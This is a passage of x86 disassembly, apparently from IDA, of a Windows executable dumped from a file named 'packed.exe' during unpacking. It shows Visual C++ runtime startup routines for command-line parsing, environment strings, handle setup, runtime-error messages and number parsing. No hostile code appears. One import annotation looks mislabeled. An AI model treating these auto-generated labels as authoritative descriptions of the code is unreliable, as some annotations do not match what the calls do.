sub_40650D endp
; =============== S U B R O U T I N E =======================================
sub_406550 proc near ; CODE XREF: sub_404200+A5�p
cmp dword_410650, 0
jnz short loc_40655E
call sub_408433
loc_40655E: ; CODE XREF: sub_406550+7�j
push esi
mov esi, dword_410648
mov al, [esi]
cmp al, 22h
jnz short loc_406590
loc_40656B: ; CODE XREF: sub_406550+33�j
; sub_406550+36�j
mov al, [esi+1]
inc esi
cmp al, 22h
jz short loc_406588
test al, al
jz short loc_406588
movzx eax, al
push eax
call sub_40802D
test eax, eax
pop ecx
jz short loc_40656B
inc esi
jmp short loc_40656B
; ---------------------------------------------------------------------------
loc_406588: ; CODE XREF: sub_406550+21�j
; sub_406550+25�j
cmp byte ptr [esi], 22h
jnz short loc_40659A
loc_40658D: ; CODE XREF: sub_406550+52�j
inc esi
jmp short loc_40659A
; ---------------------------------------------------------------------------
loc_406590: ; CODE XREF: sub_406550+19�j
cmp al, 20h
jbe short loc_40659A
loc_406594: ; CODE XREF: sub_406550+48�j
inc esi
cmp byte ptr [esi], 20h
ja short loc_406594
loc_40659A: ; CODE XREF: sub_406550+3B�j
; sub_406550+3E�j ...
mov al, [esi]
test al, al
jz short loc_4065A4
cmp al, 20h
jbe short loc_40658D
loc_4065A4: ; CODE XREF: sub_406550+4E�j
mov eax, esi
pop esi
retn
sub_406550 endp
; =============== S U B R O U T I N E =======================================
sub_4065A8 proc near ; CODE XREF: sub_404200+8E�p
push ebx
xor ebx, ebx
cmp dword_410650, ebx
push esi
push edi
jnz short loc_4065BA
call sub_408433
loc_4065BA: ; CODE XREF: sub_4065A8+B�j
mov esi, dword_40E460
xor edi, edi
loc_4065C2: ; CODE XREF: sub_4065A8+30�j
mov al, [esi]
cmp al, bl
jz short loc_4065DA
cmp al, 3Dh
jz short loc_4065CD
inc edi
loc_4065CD: ; CODE XREF: sub_4065A8+22�j
push esi
call sub_403B90
pop ecx
lea esi, [esi+eax+1]
jmp short loc_4065C2
; ---------------------------------------------------------------------------
loc_4065DA: ; CODE XREF: sub_4065A8+1E�j
lea eax, ds:4[edi*4]
push eax
call sub_40345E
mov esi, eax
pop ecx
cmp esi, ebx
mov dword_40E420, esi
jnz short loc_4065FC
push 9
call sub_4042F6
pop ecx
loc_4065FC: ; CODE XREF: sub_4065A8+4A�j
mov edi, dword_40E460
cmp [edi], bl
jz short loc_40663F
push ebp
loc_406607: ; CODE XREF: sub_4065A8+94�j
push edi
call sub_403B90
mov ebp, eax
pop ecx
inc ebp
cmp byte ptr [edi], 3Dh
jz short loc_406638
push ebp
call sub_40345E
cmp eax, ebx
pop ecx
mov [esi], eax
jnz short loc_40662B
push 9
call sub_4042F6
pop ecx
loc_40662B: ; CODE XREF: sub_4065A8+79�j
push edi
push dword ptr [esi]
call sub_403CB0
pop ecx
add esi, 4
pop ecx
loc_406638: ; CODE XREF: sub_4065A8+6C�j
add edi, ebp
cmp [edi], bl
jnz short loc_406607
pop ebp
loc_40663F: ; CODE XREF: sub_4065A8+5C�j
push dword_40E460
call sub_403B18
pop ecx
mov dword_40E460, ebx
mov [esi], ebx
pop edi
pop esi
mov dword_41064C, 1
pop ebx
retn
sub_4065A8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406661 proc near ; CODE XREF: sub_404200+89�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp dword_410650, ebx
push esi
push edi
jnz short loc_406678
call sub_408433
loc_406678: ; CODE XREF: sub_406661+10�j
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push 104h
push esi
push ebx
call dword_40A0C0 ; GetModuleFileNameA
mov eax, dword_410648
mov off_40E430, esi
mov edi, esi
cmp [eax], bl
jz short loc_40669D
mov edi, eax
loc_40669D: ; CODE XREF: sub_406661+38�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
push edi
call sub_4066FA
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
lea eax, [eax+ecx*4]
push eax
call sub_40345E
mov esi, eax
add esp, 18h
cmp esi, ebx
jnz short loc_4066CD
push 8
call sub_4042F6
pop ecx
loc_4066CD: ; CODE XREF: sub_406661+62�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_4]
lea eax, [esi+eax*4]
push eax
push esi
push edi
call sub_4066FA
mov eax, [ebp+var_4]
add esp, 14h
dec eax
mov dword_40E418, esi
pop edi
pop esi
mov dword_40E414, eax
pop ebx
leave
retn
sub_406661 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4066FA proc near ; CODE XREF: sub_406661+47�p
; sub_406661+7D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_10]
mov eax, [ebp+arg_C]
push ebx
push esi
and dword ptr [ecx], 0
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov dword ptr [eax], 1
mov eax, [ebp+arg_0]
test edi, edi
jz short loc_406724
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_406724: ; CODE XREF: sub_4066FA+20�j
cmp byte ptr [eax], 22h
jnz short loc_40676D
loc_406729: ; CODE XREF: sub_4066FA+58�j
; sub_4066FA+5F�j
mov dl, [eax+1]
inc eax
cmp dl, 22h
jz short loc_40675B
test dl, dl
jz short loc_40675B
movzx edx, dl
test byte_40F3E1[edx], 4
jz short loc_40674E
inc dword ptr [ecx]
test esi, esi
jz short loc_40674E
mov dl, [eax]
mov [esi], dl
inc esi
inc eax
loc_40674E: ; CODE XREF: sub_4066FA+46�j
; sub_4066FA+4C�j
inc dword ptr [ecx]
test esi, esi
jz short loc_406729
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_406729
; ---------------------------------------------------------------------------
loc_40675B: ; CODE XREF: sub_4066FA+36�j
; sub_4066FA+3A�j
inc dword ptr [ecx]
test esi, esi
jz short loc_406765
and byte ptr [esi], 0
inc esi
loc_406765: ; CODE XREF: sub_4066FA+65�j
cmp byte ptr [eax], 22h
jnz short loc_4067B0
inc eax
jmp short loc_4067B0
; ---------------------------------------------------------------------------
loc_40676D: ; CODE XREF: sub_4066FA+2D�j
; sub_4066FA+A5�j
inc dword ptr [ecx]
test esi, esi
jz short loc_406778
mov dl, [eax]
mov [esi], dl
inc esi
loc_406778: ; CODE XREF: sub_4066FA+77�j
mov dl, [eax]
inc eax
movzx ebx, dl
test byte_40F3E1[ebx], 4
jz short loc_406793
inc dword ptr [ecx]
test esi, esi
jz short loc_406792
mov bl, [eax]
mov [esi], bl
inc esi
loc_406792: ; CODE XREF: sub_4066FA+91�j
inc eax
loc_406793: ; CODE XREF: sub_4066FA+8B�j
cmp dl, 20h
jz short loc_4067A1
test dl, dl
jz short loc_4067A5
cmp dl, 9
jnz short loc_40676D
loc_4067A1: ; CODE XREF: sub_4066FA+9C�j
test dl, dl
jnz short loc_4067A8
loc_4067A5: ; CODE XREF: sub_4066FA+A0�j
dec eax
jmp short loc_4067B0
; ---------------------------------------------------------------------------
loc_4067A8: ; CODE XREF: sub_4066FA+A9�j
test esi, esi
jz short loc_4067B0
and byte ptr [esi-1], 0
loc_4067B0: ; CODE XREF: sub_4066FA+6E�j
; sub_4066FA+71�j ...
and [ebp+arg_10], 0
loc_4067B4: ; CODE XREF: sub_4066FA+19E�j
cmp byte ptr [eax], 0
jz loc_40689D
loc_4067BD: ; CODE XREF: sub_4066FA+D0�j
mov dl, [eax]
cmp dl, 20h
jz short loc_4067C9
cmp dl, 9
jnz short loc_4067CC
loc_4067C9: ; CODE XREF: sub_4066FA+C8�j
inc eax
jmp short loc_4067BD
; ---------------------------------------------------------------------------
loc_4067CC: ; CODE XREF: sub_4066FA+CD�j
cmp byte ptr [eax], 0
jz loc_40689D
test edi, edi
jz short loc_4067E1
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_4067E1: ; CODE XREF: sub_4066FA+DD�j
mov edx, [ebp+arg_C]
inc dword ptr [edx]
loc_4067E6: ; CODE XREF: sub_4066FA+18F�j
mov [ebp+arg_0], 1
xor ebx, ebx
loc_4067EF: ; CODE XREF: sub_4066FA+FC�j
cmp byte ptr [eax], 5Ch
jnz short loc_4067F8
inc eax
inc ebx
jmp short loc_4067EF
; ---------------------------------------------------------------------------
loc_4067F8: ; CODE XREF: sub_4066FA+F8�j
cmp byte ptr [eax], 22h
jnz short loc_406829
test bl, 1
jnz short loc_406827
xor edi, edi
cmp [ebp+arg_10], edi
jz short loc_406816
cmp byte ptr [eax+1], 22h
lea edx, [eax+1]
jnz short loc_406816
mov eax, edx
jmp short loc_406819
; ---------------------------------------------------------------------------
loc_406816: ; CODE XREF: sub_4066FA+10D�j
; sub_4066FA+116�j
mov [ebp+arg_0], edi
loc_406819: ; CODE XREF: sub_4066FA+11A�j
mov edi, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_10], edx
setz dl
mov [ebp+arg_10], edx
loc_406827: ; CODE XREF: sub_4066FA+106�j
shr ebx, 1
loc_406829: ; CODE XREF: sub_4066FA+101�j
mov edx, ebx
dec ebx
test edx, edx
jz short loc_40683E
inc ebx
loc_406831: ; CODE XREF: sub_4066FA+142�j
test esi, esi
jz short loc_406839
mov byte ptr [esi], 5Ch
inc esi
loc_406839: ; CODE XREF: sub_4066FA+139�j
inc dword ptr [ecx]
dec ebx
jnz short loc_406831
loc_40683E: ; CODE XREF: sub_4066FA+134�j
mov dl, [eax]
test dl, dl
jz short loc_40688E
cmp [ebp+arg_10], 0
jnz short loc_406854
cmp dl, 20h
jz short loc_40688E
cmp dl, 9
jz short loc_40688E
loc_406854: ; CODE XREF: sub_4066FA+14E�j
cmp [ebp+arg_0], 0
jz short loc_406888
test esi, esi
jz short loc_406877
movzx ebx, dl
test byte_40F3E1[ebx], 4
jz short loc_406870
mov [esi], dl
inc esi
inc eax
inc dword ptr [ecx]
loc_406870: ; CODE XREF: sub_4066FA+16E�j
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_406886
; ---------------------------------------------------------------------------
loc_406877: ; CODE XREF: sub_4066FA+162�j
movzx edx, dl
test byte_40F3E1[edx], 4
jz short loc_406886
inc eax
inc dword ptr [ecx]
loc_406886: ; CODE XREF: sub_4066FA+17B�j
; sub_4066FA+187�j
inc dword ptr [ecx]
loc_406888: ; CODE XREF: sub_4066FA+15E�j
inc eax
jmp loc_4067E6
; ---------------------------------------------------------------------------
loc_40688E: ; CODE XREF: sub_4066FA+148�j
; sub_4066FA+153�j ...
test esi, esi
jz short loc_406896
and byte ptr [esi], 0
inc esi
loc_406896: ; CODE XREF: sub_4066FA+196�j
inc dword ptr [ecx]
jmp loc_4067B4
; ---------------------------------------------------------------------------
loc_40689D: ; CODE XREF: sub_4066FA+BD�j
; sub_4066FA+D5�j
test edi, edi
jz short loc_4068A4
and dword ptr [edi], 0
loc_4068A4: ; CODE XREF: sub_4066FA+1A5�j
mov eax, [ebp+arg_C]
pop edi
pop esi
pop ebx
inc dword ptr [eax]
pop ebp
retn
sub_4066FA endp
; =============== S U B R O U T I N E =======================================
sub_4068AE proc near ; CODE XREF: sub_404200+7F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, dword_40E5A0
push ebx
push ebp
mov ebp, dword_40A0AC
push esi
push edi
xor ebx, ebx
xor esi, esi
xor edi, edi
cmp eax, ebx
jnz short loc_4068FC
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_4068DD
mov dword_40E5A0, 1
jmp short loc_406905
; ---------------------------------------------------------------------------
loc_4068DD: ; CODE XREF: sub_4068AE+21�j
call dword_40A0B0 ; GetEnvironmentStrings
mov edi, eax
cmp edi, ebx
jz loc_4069D7
mov dword_40E5A0, 2
jmp loc_40698B
; ---------------------------------------------------------------------------
loc_4068FC: ; CODE XREF: sub_4068AE+19�j
cmp eax, 1
jnz loc_406986
loc_406905: ; CODE XREF: sub_4068AE+2D�j
cmp esi, ebx
jnz short loc_406915
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz loc_4069D7
loc_406915: ; CODE XREF: sub_4068AE+59�j
cmp [esi], bx
mov eax, esi
jz short loc_40692A
loc_40691C: ; CODE XREF: sub_4068AE+73�j
; sub_4068AE+7A�j
inc eax
inc eax
cmp [eax], bx
jnz short loc_40691C
inc eax
inc eax
cmp [eax], bx
jnz short loc_40691C
loc_40692A: ; CODE XREF: sub_4068AE+6C�j
sub eax, esi
mov edi, dword_40A0B4
sar eax, 1
push ebx
push ebx
inc eax
push ebx
push ebx
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi ; WideCharToMultiByte
mov ebp, eax
cmp ebp, ebx
jz short loc_40697B
push ebp
call sub_40345E
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_40697B
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi ; WideCharToMultiByte
test eax, eax
jnz short loc_406977
push [esp+18h+var_8]
call sub_403B18
pop ecx
mov [esp+18h+var_8], ebx
loc_406977: ; CODE XREF: sub_4068AE+B9�j
mov ebx, [esp+18h+var_8]
loc_40697B: ; CODE XREF: sub_4068AE+99�j
; sub_4068AE+A8�j
push esi
call dword_40A160 ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_4069D9
; ---------------------------------------------------------------------------
loc_406986: ; CODE XREF: sub_4068AE+51�j
cmp eax, 2
jnz short loc_4069D7
loc_40698B: ; CODE XREF: sub_4068AE+49�j
cmp edi, ebx
jnz short loc_40699B
call dword_40A0B0 ; GetEnvironmentStrings
mov edi, eax
cmp edi, ebx
jz short loc_4069D7
loc_40699B: ; CODE XREF: sub_4068AE+DF�j
cmp [edi], bl
mov eax, edi
jz short loc_4069AB
loc_4069A1: ; CODE XREF: sub_4068AE+F6�j
; sub_4068AE+FB�j
inc eax
cmp [eax], bl
jnz short loc_4069A1
inc eax
cmp [eax], bl
jnz short loc_4069A1
loc_4069AB: ; CODE XREF: sub_4068AE+F1�j
sub eax, edi
inc eax
mov ebp, eax
push ebp
call sub_40345E
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_4069C1
xor esi, esi
jmp short loc_4069CC
; ---------------------------------------------------------------------------
loc_4069C1: ; CODE XREF: sub_4068AE+10D�j
push ebp
push edi
push esi
call sub_403510
add esp, 0Ch
loc_4069CC: ; CODE XREF: sub_4068AE+111�j
push edi
call dword_40A15C ; FreeEnvironmentStringsA
mov eax, esi
jmp short loc_4069D9
; ---------------------------------------------------------------------------
loc_4069D7: ; CODE XREF: sub_4068AE+39�j
; sub_4068AE+61�j ...
xor eax, eax
loc_4069D9: ; CODE XREF: sub_4068AE+D6�j
; sub_4068AE+127�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_4068AE endp
; =============== S U B R O U T I N E =======================================
sub_4069E0 proc near ; CODE XREF: sub_404200+6F�p
var_44 = byte ptr -44h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
sub esp, 44h
push ebx
push ebp
push esi
push edi
push 100h
call sub_40345E
mov esi, eax
pop ecx
test esi, esi
jnz short loc_406A00
push 1Bh
call sub_4042F6
pop ecx
loc_406A00: ; CODE XREF: sub_4069E0+16�j
mov dword_410520, esi
mov dword_410620, 20h
lea eax, [esi+100h]
loc_406A16: ; CODE XREF: sub_4069E0+52�j
cmp esi, eax
jnb short loc_406A34
and byte ptr [esi+4], 0
or dword ptr [esi], 0FFFFFFFFh
mov byte ptr [esi+5], 0Ah
mov eax, dword_410520
add esi, 8
add eax, 100h
jmp short loc_406A16
; ---------------------------------------------------------------------------
loc_406A34: ; CODE XREF: sub_4069E0+38�j
lea eax, [esp+54h+var_44]
push eax
call dword_40A130 ; GetStartupInfoA
cmp word ptr [esp+54h+var_14+2], 0
jz loc_406B10
mov eax, [esp+54h+var_10]
test eax, eax
jz loc_406B10
mov esi, [eax]
lea ebp, [eax+4]
mov eax, 800h
cmp esi, eax
lea ebx, [esi+ebp]
jl short loc_406A6A
mov esi, eax
loc_406A6A: ; CODE XREF: sub_4069E0+86�j
cmp dword_410620, esi
jge short loc_406AC4
mov edi, offset dword_410524
loc_406A77: ; CODE XREF: sub_4069E0+DA�j
push 100h
call sub_40345E
test eax, eax
pop ecx
jz short loc_406ABE
add dword_410620, 20h
mov [edi], eax
lea ecx, [eax+100h]
loc_406A95: ; CODE XREF: sub_4069E0+CF�j
cmp eax, ecx
jnb short loc_406AB1
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov ecx, [edi]
add eax, 8
add ecx, 100h
jmp short loc_406A95
; ---------------------------------------------------------------------------
loc_406AB1: ; CODE XREF: sub_4069E0+B7�j
add edi, 4
cmp dword_410620, esi
jl short loc_406A77
jmp short loc_406AC4
; ---------------------------------------------------------------------------
loc_406ABE: ; CODE XREF: sub_4069E0+A4�j
mov esi, dword_410620
loc_406AC4: ; CODE XREF: sub_4069E0+90�j
; sub_4069E0+DC�j
xor edi, edi
test esi, esi
jle short loc_406B10
loc_406ACA: ; CODE XREF: sub_4069E0+12E�j
mov eax, [ebx]
cmp eax, 0FFFFFFFFh
jz short loc_406B07
mov cl, [ebp+0]
test cl, 1
jz short loc_406B07
test cl, 8
jnz short loc_406AE9
push eax
call dword_40A0A0 ; GetFileType
test eax, eax
jz short loc_406B07
loc_406AE9: ; CODE XREF: sub_4069E0+FC�j
mov eax, edi
mov ecx, edi
sar eax, 5
and ecx, 1Fh
mov eax, dword_410520[eax*4]
lea eax, [eax+ecx*8]
mov ecx, [ebx]
mov [eax], ecx
mov cl, [ebp+0]
mov [eax+4], cl
loc_406B07: ; CODE XREF: sub_4069E0+EF�j
; sub_4069E0+F7�j ...
inc edi
inc ebp
add ebx, 4
cmp edi, esi
jl short loc_406ACA
loc_406B10: ; CODE XREF: sub_4069E0+65�j
; sub_4069E0+71�j ...
xor ebx, ebx
loc_406B12: ; CODE XREF: sub_4069E0+195�j
mov eax, dword_410520
cmp dword ptr [eax+ebx*8], 0FFFFFFFFh
lea esi, [eax+ebx*8]
jnz short loc_406B6D
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_406B2D
push 0FFFFFFF6h
pop eax
jmp short loc_406B37
; ---------------------------------------------------------------------------
loc_406B2D: ; CODE XREF: sub_4069E0+146�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_406B37: ; CODE XREF: sub_4069E0+14B�j
push eax
call dword_40A0A4 ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_406B5C
push edi
call dword_40A0A0 ; GetFileType
test eax, eax
jz short loc_406B5C
and eax, 0FFh
mov [esi], edi
cmp eax, 2
jnz short loc_406B62
loc_406B5C: ; CODE XREF: sub_4069E0+163�j
; sub_4069E0+16E�j
or byte ptr [esi+4], 40h
jmp short loc_406B71
; ---------------------------------------------------------------------------
loc_406B62: ; CODE XREF: sub_4069E0+17A�j
cmp eax, 3
jnz short loc_406B71
or byte ptr [esi+4], 8
jmp short loc_406B71
; ---------------------------------------------------------------------------
loc_406B6D: ; CODE XREF: sub_4069E0+13E�j
or byte ptr [esi+4], 80h
loc_406B71: ; CODE XREF: sub_4069E0+180�j
; sub_4069E0+185�j ...
inc ebx
cmp ebx, 3
jl short loc_406B12
push dword_410620
call dword_40A0A8 ; LockResource
pop edi
pop esi
pop ebp
pop ebx
add esp, 44h
retn
sub_4069E0 endp
; =============== S U B R O U T I N E =======================================
sub_406B8B proc near ; CODE XREF: sub_4042F6+9�p
; sub_40431B+9�p
mov eax, dword_40E468
cmp eax, 1
jz short loc_406BA2
test eax, eax
jnz short locret_406BC3
cmp dword_40BA44, 1
jnz short locret_406BC3
loc_406BA2: ; CODE XREF: sub_406B8B+8�j
push 0FCh
call sub_406BC4
mov eax, dword_40E5A4
pop ecx
test eax, eax
jz short loc_406BB8
call eax
loc_406BB8: ; CODE XREF: sub_406B8B+29�j
push 0FFh
call sub_406BC4
pop ecx
locret_406BC3: ; CODE XREF: sub_406B8B+C�j
; sub_406B8B+15�j
retn
sub_406B8B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406BC4 proc near ; CODE XREF: sub_4042F6+12�p
; sub_40431B+12�p ...
var_1A4 = byte ptr -1A4h
var_A0 = byte ptr -0A0h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A4h
mov edx, [ebp+arg_0]
xor ecx, ecx
mov eax, offset dword_40DD30
loc_406BD7: ; CODE XREF: sub_406BC4+20�j
cmp edx, [eax]
jz short loc_406BE6
add eax, 8
inc ecx
cmp eax, offset dword_40DDC0
jb short loc_406BD7
loc_406BE6: ; CODE XREF: sub_406BC4+15�j
push esi
mov esi, ecx
shl esi, 3
cmp edx, dword_40DD30[esi]
jnz loc_406D14
mov eax, dword_40E468
cmp eax, 1
jz loc_406CEE
test eax, eax
jnz short loc_406C17
cmp dword_40BA44, 1
jz loc_406CEE
loc_406C17: ; CODE XREF: sub_406BC4+44�j
cmp edx, 0FCh
jz loc_406D14
lea eax, [ebp+var_1A4]
push 104h
push eax
push 0
call dword_40A0C0 ; GetModuleFileNameA
test eax, eax
jnz short loc_406C4E
lea eax, [ebp+var_1A4]
push offset aProgramNameUnk ; "<program name unknown>"
push eax
call sub_403CB0
pop ecx
pop ecx
loc_406C4E: ; CODE XREF: sub_406BC4+75�j
lea eax, [ebp+var_1A4]
push edi
push eax
lea edi, [ebp+var_1A4]
call sub_403B90
inc eax
pop ecx
cmp eax, 3Ch
jbe short loc_406C91
lea eax, [ebp+var_1A4]
push eax
call sub_403B90
mov edi, eax
lea eax, [ebp+var_1A4]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_4084E0
add esp, 10h
loc_406C91: ; CODE XREF: sub_406BC4+A2�j
lea eax, [ebp+var_A0]
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push eax
call sub_403CB0
lea eax, [ebp+var_A0]
push edi
push eax
call sub_403CC0
lea eax, [ebp+var_A0]
push offset asc_40A52C ; "\n\n"
push eax
call sub_403CC0
push off_40DD34[esi]
lea eax, [ebp+var_A0]
push eax
call sub_403CC0
push 12010h
lea eax, [ebp+var_A0]
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push eax
call sub_40844F
add esp, 2Ch
pop edi
jmp short loc_406D14
; ---------------------------------------------------------------------------
loc_406CEE: ; CODE XREF: sub_406BC4+3C�j
; sub_406BC4+4D�j
lea eax, [ebp+arg_0]
lea esi, off_40DD34[esi]
push 0
push eax
push dword ptr [esi]
call sub_403B90
pop ecx
push eax
push dword ptr [esi]
push 0FFFFFFF4h
call dword_40A0A4 ; GetStdHandle
push eax
call dword_40A09C ; WriteFile
loc_406D14: ; CODE XREF: sub_406BC4+2E�j
; sub_406BC4+59�j ...
pop esi
leave
retn
sub_406BC4 endp
; =============== S U B R O U T I N E =======================================
sub_406D17 proc near ; CODE XREF: sub_404387+11B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_406D2E
add esp, 10h
retn
sub_406D17 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406D2E proc near ; CODE XREF: sub_406D17+E�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
and [ebp+var_8], 0
push esi
push edi
mov edi, [ebp+arg_0]
mov bl, [edi]
lea esi, [edi+1]
mov [ebp+var_4], esi
loc_406D46: ; CODE XREF: sub_406D2E+46�j
cmp dword_40DC8C, 1
jle short loc_406D5E
movzx eax, bl
push 8
push eax
call sub_40617E
pop ecx
pop ecx
jmp short loc_406D6D
; ---------------------------------------------------------------------------
loc_406D5E: ; CODE XREF: sub_406D2E+1F�j
mov ecx, off_40DA80
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 8
loc_406D6D: ; CODE XREF: sub_406D2E+2E�j
test eax, eax
jz short loc_406D76
mov bl, [esi]
inc esi
jmp short loc_406D46
; ---------------------------------------------------------------------------
loc_406D76: ; CODE XREF: sub_406D2E+41�j
cmp bl, 2Dh
mov [ebp+var_4], esi
jnz short loc_406D84
or [ebp+arg_C], 2
jmp short loc_406D89
; ---------------------------------------------------------------------------
loc_406D84: ; CODE XREF: sub_406D2E+4E�j
cmp bl, 2Bh
jnz short loc_406D8F
loc_406D89: ; CODE XREF: sub_406D2E+54�j
mov bl, [esi]
inc esi
mov [ebp+var_4], esi
loc_406D8F: ; CODE XREF: sub_406D2E+59�j
mov eax, [ebp+arg_8]
test eax, eax
jl loc_406F26
cmp eax, 1
jz loc_406F26
cmp eax, 24h
jg loc_406F26
push 10h
test eax, eax
pop ecx
jnz short loc_406DD7
cmp bl, 30h
jz short loc_406DC1
mov [ebp+arg_8], 0Ah
jmp short loc_406DF3
; ---------------------------------------------------------------------------
loc_406DC1: ; CODE XREF: sub_406D2E+88�j
mov al, [esi]
cmp al, 78h
jz short loc_406DD4
cmp al, 58h
jz short loc_406DD4
mov [ebp+arg_8], 8
jmp short loc_406DF3
; ---------------------------------------------------------------------------
loc_406DD4: ; CODE XREF: sub_406D2E+97�j
; sub_406D2E+9B�j
mov [ebp+arg_8], ecx
loc_406DD7: ; CODE XREF: sub_406D2E+83�j
cmp [ebp+arg_8], ecx
jnz short loc_406DF3
cmp bl, 30h
jnz short loc_406DF3
mov al, [esi]
cmp al, 78h
jz short loc_406DEB
cmp al, 58h
jnz short loc_406DF3
loc_406DEB: ; CODE XREF: sub_406D2E+B7�j
mov bl, [esi+1]
inc esi
inc esi
mov [ebp+var_4], esi
loc_406DF3: ; CODE XREF: sub_406D2E+91�j
; sub_406D2E+A4�j ...
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
mov edi, 103h
mov [ebp+var_C], eax
loc_406E03: ; CODE XREF: sub_406D2E+16C�j
cmp dword_40DC8C, 1
movzx esi, bl
jle short loc_406E1B
push 4
push esi
call sub_40617E
pop ecx
pop ecx
jmp short loc_406E26
; ---------------------------------------------------------------------------
loc_406E1B: ; CODE XREF: sub_406D2E+DF�j
mov eax, off_40DA80
mov al, [eax+esi*2]
and eax, 4
loc_406E26: ; CODE XREF: sub_406D2E+EB�j
test eax, eax
jz short loc_406E32
movsx ecx, bl
sub ecx, 30h
jmp short loc_406E64
; ---------------------------------------------------------------------------
loc_406E32: ; CODE XREF: sub_406D2E+FA�j
cmp dword_40DC8C, 1
jle short loc_406E46
push edi
push esi
call sub_40617E
pop ecx
pop ecx
jmp short loc_406E51
; ---------------------------------------------------------------------------
loc_406E46: ; CODE XREF: sub_406D2E+10B�j
mov eax, off_40DA80
mov ax, [eax+esi*2]
and eax, edi
loc_406E51: ; CODE XREF: sub_406D2E+116�j
test eax, eax
jz short loc_406E9F
movsx eax, bl
push eax
call sub_4085DE
pop ecx
mov ecx, eax
sub ecx, 37h
loc_406E64: ; CODE XREF: sub_406D2E+102�j
cmp ecx, [ebp+arg_8]
jnb short loc_406E9F
mov esi, [ebp+var_8]
or [ebp+arg_C], 8
cmp esi, [ebp+var_C]
jb short loc_406E89
jnz short loc_406E83
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
cmp ecx, edx
jbe short loc_406E89
loc_406E83: ; CODE XREF: sub_406D2E+147�j
or [ebp+arg_C], 4
jmp short loc_406E92
; ---------------------------------------------------------------------------
loc_406E89: ; CODE XREF: sub_406D2E+145�j
; sub_406D2E+153�j
imul esi, [ebp+arg_8]
add esi, ecx
mov [ebp+var_8], esi
loc_406E92: ; CODE XREF: sub_406D2E+159�j
mov eax, [ebp+var_4]
inc [ebp+var_4]
mov bl, [eax]
jmp loc_406E03
; ---------------------------------------------------------------------------
loc_406E9F: ; CODE XREF: sub_406D2E+125�j
; sub_406D2E+139�j
mov ecx, [ebp+arg_C]
dec [ebp+var_4]
mov edx, [ebp+arg_4]
test cl, 8
jnz short loc_406EBD
test edx, edx
jz short loc_406EB7
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_406EB7: ; CODE XREF: sub_406D2E+181�j
and [ebp+var_8], 0
jmp short loc_406F0A
; ---------------------------------------------------------------------------
loc_406EBD: ; CODE XREF: sub_406D2E+17D�j
test cl, 4
mov eax, 7FFFFFFFh
jnz short loc_406EE3
test cl, 1
jnz short loc_406F0A
and ecx, 2
jz short loc_406EDA
cmp [ebp+var_8], 80000000h
ja short loc_406EE3
loc_406EDA: ; CODE XREF: sub_406D2E+1A1�j
test ecx, ecx
jnz short loc_406F0A
cmp [ebp+var_8], eax
jbe short loc_406F0A
loc_406EE3: ; CODE XREF: sub_406D2E+197�j
; sub_406D2E+1AA�j
test byte ptr [ebp+arg_C], 1
mov dword_40E3F8, 22h
jz short loc_406EF9
or [ebp+var_8], 0FFFFFFFFh
jmp short loc_406F0A
; ---------------------------------------------------------------------------
loc_406EF9: ; CODE XREF: sub_406D2E+1C3�j
mov ecx, [ebp+arg_C]
and cl, 2
neg cl
sbb ecx, ecx
neg ecx
add ecx, eax
mov [ebp+var_8], ecx
loc_406F0A: ; CODE XREF: sub_406D2E+18D�j
; sub_406D2E+19C�j ...
test edx, edx
